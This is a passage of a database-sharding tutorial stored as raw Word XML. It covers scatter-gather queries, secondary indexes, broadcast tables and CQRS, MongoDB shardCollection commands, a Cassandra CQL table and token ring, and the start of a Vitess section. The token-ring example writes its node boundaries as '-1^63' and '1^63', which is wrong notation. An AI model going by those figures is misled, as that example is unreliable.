    <w:p w14:paraId="78A99CB8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEE3B01" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>Sharded by: customer_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575A4817" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Easy queries: WHERE customer_id = X (single shard)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8C7312" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Hard queries: WHERE product_id = Y (which customers bought product Y? → ALL shards)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502755C6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">              WHERE created_at &gt; '2024-01-01' (time range → ALL shards)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10127DC6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">              ORDER BY total DESC LIMIT 10 (global top-10 → ALL shards)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306FDD89" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.2 Solutions for Global Queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E92AAFC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Secondary index service (Elasticsearch):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB653B2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB5BED0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Primary data: sharded MySQL by customer_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736601CF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Secondary index: Elasticsearch (all data replicated via CDC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6050A5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="290299E4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Query by customer_id → MySQL (single shard, fast)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D69266" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Query by product_id → Elasticsearch (inverted index, fast)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BB3357" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Full-text search → Elasticsearch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAD53BD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Global analytics → Elasticsearch or data warehouse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D727045" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Materialized views / pre-computed aggregations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A49F584" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525C7263" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Background job: periodically compute "top 10 orders globally"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9D2AF6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Store result in a dedicated table/cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8607E5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Query: read pre-computed result (fast, no scatter-gather).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE99E94" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Staleness: acceptable for dashboards, analytics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30756B0F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Broadcast tables (small reference data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2398E961" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3DFA4B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Table: countries (200 rows, rarely changes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B7D0BC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>→ Replicate the ENTIRE table to ALL shards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CF8CB3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>→ JOINs with countries are always local (table exists on every shard).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33555EAF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>→ Only works for small, relatively static tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1E2721" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. CQRS (Command Query Responsibility Segregation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D008BC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEBF5EE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Write model: sharded MySQL (optimized for writes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4678F0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Read model: denormalized read store (optimized for complex queries)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9A61FC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="09ADCF60" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Writes → sharded DB → CDC → build read models → serve reads from read-optimized store</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF94CA5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="55FE4DAD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Read store can have different indexing, different organization than write store.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F6C9E1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:pict w14:anchorId="206BCDC3">
          <v:rect id="_x0000_i5767" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AB8305" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10. Sharding in Specific Database Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCE3F31" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.1 MongoDB Sharding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125B15B1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5BE770" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>// Enable sharding on database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCAA01C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>sh.enableSharding("ecommerce")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6D25A5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="6549EBC1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>// Shard a collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE62985" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>sh.shardCollection("ecommerce.orders", { customer_id: "hashed" })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD3CE6D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>// or range-based:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A2EFC9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>sh.shardCollection("ecommerce.orders", { customer_id: 1, order_date: 1 })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D5B0BC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MongoDB sharding architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E9F76A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC54C2F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>┌─────────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E08AD7E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│ Application → mongos (router) → appropriate shard    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF4B5E2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>─────────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF2635D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│ mongos: Stateless routers (deploy many for HA)       │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DAAC78" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>│ Config servers: Metadata (chunk → shard mapping)     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50174E96" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│ Shards: Replica sets holding data chunks             │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292EA5EA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>└─────────────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9FB82D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="7369A30F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Chunks: contiguous range of shard key values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A17B73" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Chunk 1: customer_id [MinKey, 1000) → Shard A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C09AE23" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Chunk 2: customer_id [1000, 2000) → Shard B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6A59DE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Chunk 3: customer_id [2000, MaxKey) → Shard C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D067BE1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="2CCB4599" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Balancer: automatically moves chunks between shards to equalize data distribution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D39D6ED" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Query routing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF6FB7D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641AEFDB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Query includes shard key → mongos routes to specific shard (targeted query).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787091BA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Query without shard key → mongos sends to ALL shards (scatter-gather/broadcast).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11937F5D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.2 Cassandra Partitioning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6289D0C0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>cql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1A37E8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>CREATE TABLE orders (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DF972B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  customer_id UUID,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B74F4C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  order_id TIMEUUID,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5369E80E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  total DECIMAL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F84BF0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  PRIMARY KEY ((customer_id), order_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7085EA69" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>) WITH CLUSTERING ORDER BY (order_id DESC);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7EAF23" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="0311A843" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>-- customer_id = partition key (determines which node stores data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5770BDF2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>-- order_id = clustering key (determines sort order within partition)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B33E22F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How Cassandra distributes data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3078D375" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1570"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>Partition key is hashed (Murmur3) → maps to a token on the ring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2654F3B1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1570"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Each node owns a range of tokens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24158C05" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1570"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Consistent hashing with vnodes (256 vnodes per node default).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A95090" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1570"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Replication factor determines copies (RF=3 → data on 3 nodes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F849FB9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Token ring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF035E7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4350B383" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Token range: -2^63 to 2^63</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A038534" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="4419E2D9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Node A: tokens -2^63 to -1^63</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30207932" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Node B: tokens -1^63 to 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D64F40" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Node C: tokens 0 to 1^63</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AB2D29" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Node D: tokens 1^63 to 2^63</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F02861" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="3549EAB4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>hash(customer_id="alice") = token 5000 → Node C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBDDC0C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  With RF=3: also stored on Node D and Node A (next 2 clockwise).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AF9E56" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.3 Vitess (MySQL Sharding)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295A2B53" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033CE014" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>┌──────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516D1956" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│                VTGate (Router)                 │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6171C951" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  Parses SQL, determines shard, routes query   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6545076F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
